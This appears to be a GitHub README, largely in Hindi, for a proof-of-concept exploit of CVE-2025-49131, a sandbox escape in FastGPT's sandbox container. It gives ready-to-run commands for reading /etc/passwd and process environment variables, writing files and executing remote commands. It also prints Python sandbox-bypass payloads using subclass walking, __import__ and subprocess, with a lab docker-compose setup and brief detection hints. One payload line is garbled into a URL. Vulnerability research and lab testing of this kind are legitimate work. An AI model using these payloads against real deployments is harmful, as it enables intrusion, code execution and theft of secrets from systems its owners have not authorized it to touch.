
CVE-2025-49131 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, FastGPT में सैंडबॉक्स एस्केप जो सैंडबॉक्स API के माध्यम से मनमाना फ़ाइल पढ़ने/लिखने, आयात बाईपास और रिमोट कोड निष्पादन की अनुमति देता है।
███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
█████╗ ███████║███████╗ ██║ ██║ ███╗██████╔╝ ██║
██╔══╝ ██╔══██║╚════██║ ██║ ██║ ██║██╔═══╝ ██║
██║ ██║ ██║███████║ ██║ ╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
███████╗ █████╗ ███╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
███████╗███████║██╔██╗ ██║██║ ██║██████╔╝██║ ██║ ╚███╔╝
╚════██║██╔══██║██║╚██╗██║██║ ██║██╔══██╗██║ ██║ ██╔██╗
███████║██║ ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗
██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝
█████╗ ███████╗██║ ███████║██████╔╝█████╗
██╔══╝ ╚════██║██║ ██╔══██║██╔═══╝ ██╔══╝
███████╗███████║╚██████╗██║ ██║██║ ███████╗
╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚══════╝
╔═══════════════════════════════════════╗
║ CVE-2025-49131 | CVSS 6.3 ║
║ FastGPT Sandbox Container Escape ║
║ Affected: < v4.9.11 ║
╚═══════════════════════════════════════╝
| Field | Value |
|---|---|
| CVE ID | CVE-2025-49131 |
| CVSS Score | 6.3 (मध्यम) |
| CVSS Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| Vulnerability Type | Sandbox Escape |
| Affected Software | FastGPT (fastgpt-sandbox container) |
| Affected Versions | < 4.9.11 |
| Patched Version | 4.9.11+ |
| Disclosure Date | 9 जून, 2025 |
यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है।
CVE-2025-49131, FastGPT के fastgpt-sandbox कंटेनर में एक सैंडबॉक्स एस्केप भेद्यता है। यह भेद्यता निम्न कारणों से मौजूद है:
सफल शोषण से हमलावर निम्न कार्य कर सकता है:
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc
# Install dependencies
pip install -r requirements.txt
# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect
# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd
# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"
# Start vulnerable and patched containers
docker-compose up -d
# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002
python poc.py --target http://localhost:3001 --detect -v
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess
python poc.py --target http://localhost:3001 --env
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"
python poc.py --help
cve-2025-49131-poc/
├── poc.py # Main exploit script
├── payloads.py # Payload generator library
├── docker-compose.yml # Test environment
├── requirements.txt # Python dependencies
├── README.md # This file
└── tests/
└── test_exploit.py # Automated tests
FastGPT सैंडबॉक्स को उपयोगकर्ता द्वारा प्रस्तुत कोड को एक पृथक वातावरण में निष्पादित करने के लिए डिज़ाइन किया गया है। हालाँकि, अलगाव तंत्र अपर्याप्त हैं:
Python __builtins__ एक्सेस - सैंडबॉक्स open(), __import__() जैसे बिल्ट-इन फ़ंक्शंस तक पहुँच को ठीक से प्रतिबंधित नहीं करता।
Syscall फ़िल्टरिंग - अनुमत syscall सूची में खतरनाक कॉल शामिल हैं जो फ़ाइल सिस्टम तक पहुँच को सक्षम करती हैं।
आयात प्रतिबंध बायपास - मॉड्यूल आयात प्रतिबंधों को बायपास करने के लिए कई तकनीकें मौजूद हैं।
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API │
└─────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using: │
│ - __builtins__ manipulation │
│ - Subclass walking │
│ - Import bypass techniques │
└─────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to: │
│ - File system (read/write) │
│ - os/subprocess modules │
│ - Environment variables │
└─────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────┐
│ 4. Impact: │
│ - Data exfiltration │
│ - Code injection │
│ - Remote command execution │
└─────────────────────────────────────────────┘
फ़ाइल पढ़ना:
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()
आयात बायपास:
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__()
if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)
RCE:
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)
सैंडबॉक्स लॉग में संदिग्ध गतिविधि देखें:
/etc/passwd, /etc/shadow तक पहुँचने का प्रयास__builtins__, __import__ के कॉल| तिथि | घटना |
|---|---|
| 2025-??-?? | भेद्यता की खोज |
| 2025-??-?? | विक्रेता को सूचित किया गया |
| 2025-06-?? | पैच जारी (v4.9.11) |
| 2025-06-09 | सार्वजनिक प्रकटीकरण |
यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें।
सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।